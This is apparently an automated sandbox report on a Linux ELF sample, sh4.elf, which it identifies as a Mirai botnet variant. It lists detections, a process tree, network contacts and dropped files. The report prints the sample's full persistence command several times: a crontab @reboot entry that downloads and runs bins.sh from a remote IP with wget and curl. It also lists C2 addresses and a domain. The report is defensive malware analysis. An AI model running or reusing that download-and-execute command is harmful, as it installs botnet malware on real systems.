Create Interactive Tour

Linux Analysis Report
sh4.elf

Overview

General Information

Sample name:sh4.elf
Analysis ID:1646355
MD5:d6b9804cee75cc6115bb50814ba03002
SHA1:344495d026b0414343d9f7ba4ef405e8e527d1a0
SHA256:224d2f79cf57b625edda8b9358d774c49d507b19a19af8682e2f1dfba623cf92
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646355
Start date and time:2025-03-23 23:03:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:sh4.elf
Detection:MAL
Classification:mal72.troj.linELF@0/48@2/0
  • VT rate limit hit for: api.znet.homes
Command:/tmp/sh4.elf
PID:5510
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • sh4.elf (PID: 5510, Parent: 5427, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.elf
    • sh4.elf New Fork (PID: 5513, Parent: 5510)
      • sh4.elf New Fork (PID: 5515, Parent: 5513)
      • sh4.elf New Fork (PID: 5519, Parent: 5513)
      • sh4.elf New Fork (PID: 5521, Parent: 5513)
      • sh4.elf New Fork (PID: 5523, Parent: 5513)
      • sh (PID: 5523, Parent: 5513, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5525, Parent: 5523)
          • sh New Fork (PID: 5527, Parent: 5525)
          • crontab (PID: 5527, Parent: 5525, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5528, Parent: 5525)
          • chmod (PID: 5528, Parent: 5525, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5529, Parent: 5525)
          • sh (PID: 5529, Parent: 5525, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5530, Parent: 5525)
          • curl (PID: 5530, Parent: 5525, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
        • sh New Fork (PID: 5526, Parent: 5523)
        • crontab (PID: 5526, Parent: 5523, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
sh4.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5515.1.00007ff3e0400000.00007ff3e0412000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      5510.1.00007ff3e0400000.00007ff3e0412000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: sh4.elfAvira: detected
        Source: sh4.elfVirustotal: Detection: 29%Perma Link
        Source: sh4.elfReversingLabs: Detection: 30%
        Source: sh4.elfString: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogsh4->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd\
        Source: sh4.elfString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
        Source: sh4.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca

        Networking

        barindex
        Source: global trafficTCP traffic: 155.138.230.16 ports 1290,0,1,2,80,9
        Source: global trafficTCP traffic: 192.168.2.15:46702 -> 155.138.230.16:1290
        Source: /tmp/sh4.elf (PID: 5510)Socket: 127.0.0.1:4161Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.15:48914 -> 155.138.230.16:80
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: api.znet.homes
        Source: sh4.elfString found in binary or memory: http://155.138.230.16/bins/bins.sh;
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogsh4->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd\
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/sh4.elf (PID: 5515)SIGKILL sent: pid: 5515, result: unknownJump to behavior
        Source: classification engineClassification label: mal72.troj.linELF@0/48@2/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 5527)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 5526)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /bin/curl (PID: 5530)Directory: /root/.curlrcJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/110/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/231/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/111/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/112/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/233/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/113/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/114/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/235/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/115/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1333/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/116/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1695/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/117/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/118/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/119/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/911/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/914/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/10/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/917/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/11/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/12/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/13/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/14/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/15/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/16/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/17/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/18/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/19/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1591/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/120/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/121/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/122/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/243/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/2/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/123/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/3/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/124/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1588/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/125/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/4/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/246/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/126/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/5/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/127/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/6/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1585/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/128/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/7/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/129/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/8/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/800/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/9/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/802/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/803/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/804/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/20/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/21/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/3407/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/22/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/23/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/24/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/25/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/26/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/27/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/28/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/29/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1484/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/490/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/250/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/130/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/251/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/131/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/132/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/133/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1479/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/378/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/258/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/259/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/931/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1595/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/812/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/933/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/30/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/3419/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/35/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/3310/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/260/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/261/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/262/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/142/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/263/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/264/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/265/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/145/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/266/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/267/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/268/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/3303/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/269/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1486/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/1806/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/3440/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/270/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5519)File opened: /proc/271/statJump to behavior
        Source: /tmp/sh4.elf (PID: 5523)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
        Source: /bin/sh (PID: 5528)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
        Source: /tmp/sh4.elf (PID: 5521)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/sh4.elf (PID: 5521)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/sh4.elf (PID: 5510)Queries kernel information via 'uname': Jump to behavior
        Source: sh4.elf, 5515.1.00007ffe9b384000.00007ffe9b3a5000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.Bxtoae
        Source: sh4.elf, 5510.1.00007ffe9b384000.00007ffe9b3a5000.rw-.sdmp, sh4.elf, 5515.1.00007ffe9b384000.00007ffe9b3a5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
        Source: sh4.elf, 5510.1.000055d7f5546000.000055d7f55cf000.rw-.sdmp, sh4.elf, 5515.1.000055d7f5546000.000055d7f55cf000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
        Source: sh4.elf, 5510.1.000055d7f5546000.000055d7f55cf000.rw-.sdmp, sh4.elf, 5515.1.000055d7f5546000.000055d7f55cf000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
        Source: sh4.elf, 5510.1.00007ffe9b384000.00007ffe9b3a5000.rw-.sdmp, sh4.elf, 5515.1.00007ffe9b384000.00007ffe9b3a5000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.elf
        Source: sh4.elf, 5515.1.00007ffe9b384000.00007ffe9b3a5000.rw-.sdmpBinary or memory string: /tmp/qemu-open.Bxtoae

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sh4.elf, type: SAMPLE
        Source: Yara matchFile source: 5515.1.00007ff3e0400000.00007ff3e0412000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5510.1.00007ff3e0400000.00007ff3e0412000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sh4.elf, type: SAMPLE
        Source: Yara matchFile source: 5515.1.00007ff3e0400000.00007ff3e0412000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5510.1.00007ff3e0400000.00007ff3e0412000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Standard Port
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts1
        File and Directory Permissions Modification
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Hidden Files and Directories
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646355 Sample: sh4.elf Startdate: 23/03/2025 Architecture: LINUX Score: 72 36 api.znet.homes 155.138.230.16, 1290, 80 AS-CHOOPAUS United States 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Mirai 2->42 44 Connects to many ports of the same IP (likely port scanning) 2->44 10 sh4.elf 2->10         started        signatures3 process4 process5 12 sh4.elf 10->12         started        process6 14 sh4.elf sh 12->14         started        16 sh4.elf 12->16         started        18 sh4.elf 12->18         started        20 sh4.elf 12->20         started        process7 22 sh 14->22         started        24 sh crontab 14->24         started        signatures8 27 sh crontab 22->27         started        30 sh chmod 22->30         started        32 sh sh 22->32         started        34 sh curl 22->34         started        46 Executes the "crontab" command typically for achieving persistence 24->46 process9 signatures10 48 Executes the "crontab" command typically for achieving persistence 27->48

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        sh4.elf30%VirustotalBrowse
        sh4.elf31%ReversingLabsLinux.Backdoor.Mirai
        sh4.elf100%AviraEXP/ELF.Mirai.W
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://155.138.230.16/bins/bins.sh;100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.znet.homes
        155.138.230.16
        truetrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://155.138.230.16/bins/bins.sh;sh4.elffalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          155.138.230.16
          api.znet.homesUnited States
          20473AS-CHOOPAUStrue
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          155.138.230.16i686.elfGet hashmaliciousMiraiBrowse
            mips.elfGet hashmaliciousMiraiBrowse
              mipsel.elfGet hashmaliciousMiraiBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                api.znet.homesi686.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mips.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mipsel.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-CHOOPAUSi686.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mips.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                mipsel.elfGet hashmaliciousMiraiBrowse
                • 155.138.230.16
                Setup.exeGet hashmaliciousUnknownBrowse
                • 45.32.1.23
                xpmg.exeGet hashmaliciousUnknownBrowse
                • 155.138.150.12
                courtyardhealthcare.com.exeGet hashmaliciousUnknownBrowse
                • 139.180.160.173
                compited.ps1Get hashmaliciousUnknownBrowse
                • 139.180.160.173
                Nyx4r.mpsl.elfGet hashmaliciousOkiruBrowse
                • 44.168.169.166
                hoho.armv5l.elfGet hashmaliciousUnknownBrowse
                • 44.174.49.98
                yarn.elfGet hashmaliciousUnknownBrowse
                • 149.253.222.204
                No context
                No context
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Reputation:low
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
